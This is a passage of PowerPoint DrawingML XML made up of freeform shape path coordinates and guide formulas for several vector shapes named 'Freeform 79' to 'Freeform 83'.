                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="315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8" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3165475" y="5565775"/>
                <a:ext cx="228600" cy="279400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 447 w 636"/>
                  <a:gd name="T1" fmla="*/ 268 h 778"/>
                  <a:gd name="T2" fmla="*/ 452 w 636"/>
                  <a:gd name="T3" fmla="*/ 273 h 778"/>
                  <a:gd name="T4" fmla="*/ 520 w 636"/>
                  <a:gd name="T5" fmla="*/ 268 h 778"/>
                  <a:gd name="T6" fmla="*/ 551 w 636"/>
                  <a:gd name="T7" fmla="*/ 284 h 778"/>
                  <a:gd name="T8" fmla="*/ 583 w 636"/>
                  <a:gd name="T9" fmla="*/ 305 h 778"/>
                  <a:gd name="T10" fmla="*/ 630 w 636"/>
                  <a:gd name="T11" fmla="*/ 368 h 778"/>
                  <a:gd name="T12" fmla="*/ 635 w 636"/>
                  <a:gd name="T13" fmla="*/ 442 h 778"/>
                  <a:gd name="T14" fmla="*/ 620 w 636"/>
                  <a:gd name="T15" fmla="*/ 483 h 778"/>
                  <a:gd name="T16" fmla="*/ 557 w 636"/>
                  <a:gd name="T17" fmla="*/ 583 h 778"/>
                  <a:gd name="T18" fmla="*/ 510 w 636"/>
                  <a:gd name="T19" fmla="*/ 636 h 778"/>
                  <a:gd name="T20" fmla="*/ 415 w 636"/>
                  <a:gd name="T21" fmla="*/ 730 h 778"/>
                  <a:gd name="T22" fmla="*/ 331 w 636"/>
                  <a:gd name="T23" fmla="*/ 772 h 778"/>
                  <a:gd name="T24" fmla="*/ 294 w 636"/>
                  <a:gd name="T25" fmla="*/ 777 h 778"/>
                  <a:gd name="T26" fmla="*/ 221 w 636"/>
                  <a:gd name="T27" fmla="*/ 762 h 778"/>
                  <a:gd name="T28" fmla="*/ 189 w 636"/>
                  <a:gd name="T29" fmla="*/ 736 h 778"/>
                  <a:gd name="T30" fmla="*/ 147 w 636"/>
                  <a:gd name="T31" fmla="*/ 672 h 778"/>
                  <a:gd name="T32" fmla="*/ 137 w 636"/>
                  <a:gd name="T33" fmla="*/ 641 h 778"/>
                  <a:gd name="T34" fmla="*/ 142 w 636"/>
                  <a:gd name="T35" fmla="*/ 599 h 778"/>
                  <a:gd name="T36" fmla="*/ 0 w 636"/>
                  <a:gd name="T37" fmla="*/ 546 h 778"/>
                  <a:gd name="T38" fmla="*/ 609 w 636"/>
                  <a:gd name="T39" fmla="*/ 95 h 778"/>
                  <a:gd name="T40" fmla="*/ 210 w 636"/>
                  <a:gd name="T41" fmla="*/ 552 h 778"/>
                  <a:gd name="T42" fmla="*/ 205 w 636"/>
                  <a:gd name="T43" fmla="*/ 589 h 778"/>
                  <a:gd name="T44" fmla="*/ 226 w 636"/>
                  <a:gd name="T45" fmla="*/ 625 h 778"/>
                  <a:gd name="T46" fmla="*/ 242 w 636"/>
                  <a:gd name="T47" fmla="*/ 636 h 778"/>
                  <a:gd name="T48" fmla="*/ 284 w 636"/>
                  <a:gd name="T49" fmla="*/ 641 h 778"/>
                  <a:gd name="T50" fmla="*/ 305 w 636"/>
                  <a:gd name="T51" fmla="*/ 630 h 778"/>
                  <a:gd name="T52" fmla="*/ 404 w 636"/>
                  <a:gd name="T53" fmla="*/ 541 h 778"/>
                  <a:gd name="T54" fmla="*/ 457 w 636"/>
                  <a:gd name="T55" fmla="*/ 478 h 778"/>
                  <a:gd name="T56" fmla="*/ 488 w 636"/>
                  <a:gd name="T57" fmla="*/ 431 h 778"/>
                  <a:gd name="T58" fmla="*/ 494 w 636"/>
                  <a:gd name="T59" fmla="*/ 389 h 778"/>
                  <a:gd name="T60" fmla="*/ 473 w 636"/>
                  <a:gd name="T61" fmla="*/ 352 h 778"/>
                  <a:gd name="T62" fmla="*/ 457 w 636"/>
                  <a:gd name="T63" fmla="*/ 342 h 778"/>
                  <a:gd name="T64" fmla="*/ 420 w 636"/>
                  <a:gd name="T65" fmla="*/ 336 h 778"/>
                  <a:gd name="T66" fmla="*/ 399 w 636"/>
                  <a:gd name="T67" fmla="*/ 347 h 778"/>
                  <a:gd name="T68" fmla="*/ 294 w 636"/>
                  <a:gd name="T69" fmla="*/ 436 h 778"/>
                  <a:gd name="T70" fmla="*/ 242 w 636"/>
                  <a:gd name="T71" fmla="*/ 499 h 7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36" h="778">
                    <a:moveTo>
                      <a:pt x="609" y="95"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="95"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="552"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="552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9" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3314700" y="5688013"/>
                <a:ext cx="212725" cy="242887"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 462 w 589"/>
                  <a:gd name="T1" fmla="*/ 236 h 673"/>
                  <a:gd name="T2" fmla="*/ 110 w 589"/>
                  <a:gd name="T3" fmla="*/ 672 h 673"/>
                  <a:gd name="T4" fmla="*/ 0 w 589"/>
                  <a:gd name="T5" fmla="*/ 577 h 673"/>
                  <a:gd name="T6" fmla="*/ 352 w 589"/>
                  <a:gd name="T7" fmla="*/ 147 h 673"/>
                  <a:gd name="T8" fmla="*/ 462 w 589"/>
                  <a:gd name="T9" fmla="*/ 236 h 673"/>
                  <a:gd name="T10" fmla="*/ 588 w 589"/>
                  <a:gd name="T11" fmla="*/ 89 h 673"/>
                  <a:gd name="T12" fmla="*/ 509 w 589"/>
                  <a:gd name="T13" fmla="*/ 184 h 673"/>
                  <a:gd name="T14" fmla="*/ 399 w 589"/>
                  <a:gd name="T15" fmla="*/ 95 h 673"/>
                  <a:gd name="T16" fmla="*/ 473 w 589"/>
                  <a:gd name="T17" fmla="*/ 0 h 673"/>
                  <a:gd name="T18" fmla="*/ 588 w 589"/>
                  <a:gd name="T19" fmla="*/ 89 h 6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89" h="673">
                    <a:moveTo>
                      <a:pt x="462" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="588" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="89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0" name="Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3387725" y="5743575"/>
                <a:ext cx="204788" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 568"/>
                  <a:gd name="T1" fmla="*/ 89 h 678"/>
                  <a:gd name="T2" fmla="*/ 115 w 568"/>
                  <a:gd name="T3" fmla="*/ 677 h 678"/>
                  <a:gd name="T4" fmla="*/ 0 w 568"/>
                  <a:gd name="T5" fmla="*/ 593 h 678"/>
                  <a:gd name="T6" fmla="*/ 451 w 568"/>
                  <a:gd name="T7" fmla="*/ 0 h 678"/>
                  <a:gd name="T8" fmla="*/ 567 w 568"/>
                  <a:gd name="T9" fmla="*/ 89 h 6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8" h="678">
                    <a:moveTo>
                      <a:pt x="567" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="115" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="89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1" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3465513" y="5792788"/>
                <a:ext cx="198437" cy="252412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 441 w 552"/>
                  <a:gd name="T1" fmla="*/ 242 h 699"/>
                  <a:gd name="T2" fmla="*/ 116 w 552"/>
                  <a:gd name="T3" fmla="*/ 698 h 699"/>
                  <a:gd name="T4" fmla="*/ 0 w 552"/>
                  <a:gd name="T5" fmla="*/ 614 h 699"/>
                  <a:gd name="T6" fmla="*/ 325 w 552"/>
                  <a:gd name="T7" fmla="*/ 158 h 699"/>
                  <a:gd name="T8" fmla="*/ 441 w 552"/>
                  <a:gd name="T9" fmla="*/ 242 h 699"/>
                  <a:gd name="T10" fmla="*/ 551 w 552"/>
                  <a:gd name="T11" fmla="*/ 84 h 699"/>
                  <a:gd name="T12" fmla="*/ 483 w 552"/>
                  <a:gd name="T13" fmla="*/ 184 h 699"/>
                  <a:gd name="T14" fmla="*/ 362 w 552"/>
                  <a:gd name="T15" fmla="*/ 100 h 699"/>
                  <a:gd name="T16" fmla="*/ 436 w 552"/>
                  <a:gd name="T17" fmla="*/ 0 h 699"/>
                  <a:gd name="T18" fmla="*/ 551 w 552"/>
                  <a:gd name="T19" fmla="*/ 84 h 6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52" h="699">
                    <a:moveTo>
                      <a:pt x="441" y="242"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="242"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="551" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="483" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="84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2" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3565525" y="5857875"/>
                <a:ext cx="173038" cy="263525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 478 w 479"/>
                  <a:gd name="T1" fmla="*/ 78 h 730"/>
                  <a:gd name="T2" fmla="*/ 389 w 479"/>
                  <a:gd name="T3" fmla="*/ 215 h 730"/>
                  <a:gd name="T4" fmla="*/ 462 w 479"/>
                  <a:gd name="T5" fmla="*/ 257 h 730"/>
                  <a:gd name="T6" fmla="*/ 410 w 479"/>
                  <a:gd name="T7" fmla="*/ 341 h 730"/>
                  <a:gd name="T8" fmla="*/ 336 w 479"/>
                  <a:gd name="T9" fmla="*/ 294 h 730"/>
                  <a:gd name="T10" fmla="*/ 173 w 479"/>
                  <a:gd name="T11" fmla="*/ 551 h 730"/>
                  <a:gd name="T12" fmla="*/ 173 w 479"/>
                  <a:gd name="T13" fmla="*/ 551 h 730"/>
                  <a:gd name="T14" fmla="*/ 158 w 479"/>
                  <a:gd name="T15" fmla="*/ 577 h 730"/>
                  <a:gd name="T16" fmla="*/ 158 w 479"/>
                  <a:gd name="T17" fmla="*/ 593 h 730"/>
                  <a:gd name="T18" fmla="*/ 158 w 479"/>
                  <a:gd name="T19" fmla="*/ 593 h 730"/>
                  <a:gd name="T20" fmla="*/ 163 w 479"/>
                  <a:gd name="T21" fmla="*/ 614 h 730"/>
                  <a:gd name="T22" fmla="*/ 184 w 479"/>
                  <a:gd name="T23" fmla="*/ 630 h 730"/>
                  <a:gd name="T24" fmla="*/ 184 w 479"/>
                  <a:gd name="T25" fmla="*/ 630 h 730"/>
                  <a:gd name="T26" fmla="*/ 194 w 479"/>
                  <a:gd name="T27" fmla="*/ 635 h 730"/>
                  <a:gd name="T28" fmla="*/ 194 w 479"/>
                  <a:gd name="T29" fmla="*/ 635 h 730"/>
                  <a:gd name="T30" fmla="*/ 210 w 479"/>
                  <a:gd name="T31" fmla="*/ 645 h 730"/>
                  <a:gd name="T32" fmla="*/ 158 w 479"/>
                  <a:gd name="T33" fmla="*/ 729 h 730"/>
                  <a:gd name="T34" fmla="*/ 158 w 479"/>
                  <a:gd name="T35" fmla="*/ 729 h 730"/>
                  <a:gd name="T36" fmla="*/ 116 w 479"/>
                  <a:gd name="T37" fmla="*/ 703 h 730"/>
                  <a:gd name="T38" fmla="*/ 116 w 479"/>
                  <a:gd name="T39" fmla="*/ 703 h 730"/>
                  <a:gd name="T40" fmla="*/ 74 w 479"/>
                  <a:gd name="T41" fmla="*/ 682 h 730"/>
                  <a:gd name="T42" fmla="*/ 74 w 479"/>
                  <a:gd name="T43" fmla="*/ 682 h 730"/>
                  <a:gd name="T44" fmla="*/ 42 w 479"/>
                  <a:gd name="T45" fmla="*/ 656 h 730"/>
                  <a:gd name="T46" fmla="*/ 21 w 479"/>
                  <a:gd name="T47" fmla="*/ 640 h 730"/>
                  <a:gd name="T48" fmla="*/ 21 w 479"/>
                  <a:gd name="T49" fmla="*/ 640 h 730"/>
                  <a:gd name="T50" fmla="*/ 6 w 479"/>
                  <a:gd name="T51" fmla="*/ 619 h 730"/>
                  <a:gd name="T52" fmla="*/ 0 w 479"/>
                  <a:gd name="T53" fmla="*/ 598 h 730"/>
                  <a:gd name="T54" fmla="*/ 0 w 479"/>
                  <a:gd name="T55" fmla="*/ 598 h 730"/>
                  <a:gd name="T56" fmla="*/ 0 w 479"/>
                  <a:gd name="T57" fmla="*/ 572 h 730"/>
                  <a:gd name="T58" fmla="*/ 11 w 479"/>
                  <a:gd name="T59" fmla="*/ 545 h 730"/>
                  <a:gd name="T60" fmla="*/ 11 w 479"/>
                  <a:gd name="T61" fmla="*/ 545 h 730"/>
                  <a:gd name="T62" fmla="*/ 42 w 479"/>
                  <a:gd name="T63" fmla="*/ 488 h 730"/>
                  <a:gd name="T64" fmla="*/ 216 w 479"/>
                  <a:gd name="T65" fmla="*/ 215 h 730"/>
                  <a:gd name="T66" fmla="*/ 158 w 479"/>
                  <a:gd name="T67" fmla="*/ 178 h 730"/>
                  <a:gd name="T68" fmla="*/ 210 w 479"/>
                  <a:gd name="T69" fmla="*/ 94 h 730"/>
                  <a:gd name="T70" fmla="*/ 273 w 479"/>
                  <a:gd name="T71" fmla="*/ 136 h 730"/>
                  <a:gd name="T72" fmla="*/ 357 w 479"/>
                  <a:gd name="T73" fmla="*/ 0 h 730"/>
                  <a:gd name="T74" fmla="*/ 478 w 479"/>
                  <a:gd name="T75" fmla="*/ 78 h 7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79" h="730">
                    <a:moveTo>
                      <a:pt x="478" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
